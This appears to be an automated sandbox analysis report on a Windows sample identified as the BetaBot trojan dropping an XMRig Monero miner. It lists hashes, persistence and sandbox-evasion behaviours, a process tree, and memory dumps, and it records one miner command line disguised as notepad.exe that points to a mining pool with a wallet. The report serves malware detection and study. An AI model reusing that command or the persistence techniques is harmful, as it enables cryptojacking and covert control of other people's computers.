Analysis

  • max time kernel
    154s
  • max time network
    184s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    07-07-2022 23:58

General

  • Target

    43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe

  • Size

    2.1MB

  • MD5

    65c47159ad930504229825ef323aecf8

  • SHA1

    26974a01d0815a6f5cc63b34527a1a6a91ba2705

  • SHA256

    43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16

  • SHA512

    d2ccc975b97380f2c3d4fdc0d403f0b150b4e34eedc6b1e3f4d4d1ff773a6bb0d7dcb48cccfd83e8ac06ec2972006da9bc21481cadf02563dcc17cbe89888d77

Malware Config

Signatures

  • BetaBot

    Beta Bot is a Trojan that infects computers and disables Antivirus.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies firewall policy service 2 TTPs 4 IoCs
  • suricata: ET MALWARE Win32/Neurevt.A/Betabot Check-in 4

    suricata: ET MALWARE Win32/Neurevt.A/Betabot Check-in 4

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 3 IoCs
  • Sets file execution options in registry 2 TTPs 4 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies Internet Explorer Protected Mode 1 TTPs 4 IoCs
  • Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1280
      • C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
        "C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
        2⤵
        • Drops startup file
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1928
        • C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
          "C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
          3⤵
          • Sets file execution options in registry
          • Checks whether UAC is enabled
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Checks processor information in registry
          • Suspicious behavior: MapViewOfSection
          • Suspicious behavior: RenamesItself
          • Suspicious use of AdjustPrivilegeToken
          PID:1484
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            4⤵
            • Modifies firewall policy service
            • Sets file execution options in registry
            • Checks BIOS information in registry
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Checks processor information in registry
            • Enumerates system info in registry
            • Modifies Internet Explorer Protected Mode
            • Modifies Internet Explorer Protected Mode Banner
            • Modifies Internet Explorer settings
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:568
        • C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
          "C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
          3⤵
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          PID:940
          • C:\Windows\notepad.exe
            "C:\Windows\notepad.exe" -o pool.monero.hashvault.pro:5555:80 -u 48g2oLrkRG5JtnYA1pUukrYHgsu6aBqGTVxzZx6av6wvhBtgTHrKquWXMY2BJNnxs3aqj3U5RMnoZ6HaZYRMUouU8ke7kC4 -p trainwreck -v 0 -t 2
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1180
        • C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
          "C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1400
          • C:\Windows\SysWOW64\msiexec.exe
            C:\Windows\SysWOW64\msiexec.exe
            4⤵
            • Modifies WinLogon for persistence
            • Adds Run key to start application
            • Maps connected drives based on registry
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            PID:560
    • C:\Windows\system32\Dwm.exe
      "C:\Windows\system32\Dwm.exe"
      1⤵
        PID:1248
      • C:\Windows\system32\DllHost.exe
        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
        1⤵
          PID:1556

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/560-99-0x0000000002220000-0x00000000024A5000-memory.dmp

          Filesize

          2.5MB

        • memory/560-105-0x0000000002220000-0x00000000024A5000-memory.dmp

          Filesize

          2.5MB

        • memory/560-89-0x0000000000000000-mapping.dmp

        • memory/560-100-0x0000000000360000-0x000000000036C000-memory.dmp

          Filesize

          48KB

        • memory/568-91-0x0000000000000000-mapping.dmp

        • memory/568-93-0x0000000074021000-0x0000000074023000-memory.dmp

          Filesize

          8KB

        • memory/568-94-0x0000000077240000-0x00000000773C0000-memory.dmp

          Filesize

          1.5MB

        • memory/568-104-0x0000000000110000-0x0000000000395000-memory.dmp

          Filesize

          2.5MB

        • memory/568-103-0x0000000077240000-0x00000000773C0000-memory.dmp

          Filesize

          1.5MB

        • memory/568-95-0x0000000000110000-0x0000000000395000-memory.dmp

          Filesize

          2.5MB

        • memory/568-96-0x0000000000570000-0x000000000057C000-memory.dmp

          Filesize

          48KB

        • memory/940-66-0x0000000000400000-0x00000000004B7000-memory.dmp

          Filesize

          732KB

        • memory/940-69-0x0000000000400000-0x00000000004B7000-memory.dmp

          Filesize

          732KB

        • memory/940-61-0x0000000000000000-mapping.dmp

        • memory/940-80-0x0000000000400000-0x00000000004B7000-memory.dmp

          Filesize

          732KB

        • memory/1180-77-0x0000000000400000-0x00000000004DA000-memory.dmp

          Filesize

          872KB

        • memory/1180-101-0x0000000000000000-0x0000000000600000-memory.dmp

          Filesize

          6.0MB

        • memory/1180-79-0x0000000000400000-0x00000000004DA000-memory.dmp

          Filesize

          872KB

        • memory/1180-81-0x0000000000400000-0x00000000004DA000-memory.dmp

          Filesize

          872KB

        • memory/1180-76-0x00000000004D3D30-mapping.dmp

        • memory/1180-102-0x0000000000400000-0x00000000004DA000-memory.dmp

          Filesize

          872KB

        • memory/1180-75-0x0000000000400000-0x00000000004DA000-memory.dmp

          Filesize

          872KB

        • memory/1180-106-0x0000000000000000-0x0000000000600000-memory.dmp

          Filesize

          6.0MB

        • memory/1180-86-0x0000000000400000-0x00000000004DA000-memory.dmp

          Filesize

          872KB

        • memory/1280-108-0x0000000002210000-0x0000000002216000-memory.dmp

          Filesize

          24KB

        • memory/1400-98-0x0000000000400000-0x00000000004AA000-memory.dmp

          Filesize

          680KB

        • memory/1400-70-0x0000000000400000-0x00000000004AA000-memory.dmp

          Filesize

          680KB

        • memory/1400-63-0x0000000000000000-mapping.dmp

        • memory/1400-65-0x0000000000400000-0x00000000004AA000-memory.dmp

          Filesize

          680KB

        • memory/1400-83-0x0000000000400000-0x00000000004AA000-memory.dmp

          Filesize

          680KB

        • memory/1484-82-0x0000000002140000-0x00000000021A6000-memory.dmp

          Filesize

          408KB

        • memory/1484-60-0x0000000000400000-0x0000000000435000-memory.dmp

          Filesize

          212KB

        • memory/1484-97-0x0000000002140000-0x00000000021A6000-memory.dmp

          Filesize

          408KB

        • memory/1484-58-0x0000000000000000-mapping.dmp

        • memory/1484-71-0x0000000000400000-0x0000000000435000-memory.dmp

          Filesize

          212KB

        • memory/1484-88-0x00000000007B0000-0x00000000007BC000-memory.dmp

          Filesize

          48KB

        • memory/1484-59-0x0000000000400000-0x0000000000435000-memory.dmp

          Filesize

          212KB

        • memory/1484-78-0x0000000000400000-0x0000000000435000-memory.dmp

          Filesize

          212KB

        • memory/1484-84-0x0000000002140000-0x00000000021A6000-memory.dmp

          Filesize

          408KB

        • memory/1484-87-0x0000000000270000-0x000000000027D000-memory.dmp

          Filesize

          52KB

        • memory/1556-107-0x0000000003A50000-0x0000000003A56000-memory.dmp

          Filesize

          24KB

        • memory/1928-64-0x0000000000320000-0x0000000000327000-memory.dmp

          Filesize

          28KB

        • memory/1928-54-0x0000000075CF1000-0x0000000075CF3000-memory.dmp

          Filesize

          8KB

        • memory/1928-57-0x0000000000320000-0x0000000000327000-memory.dmp

          Filesize

          28KB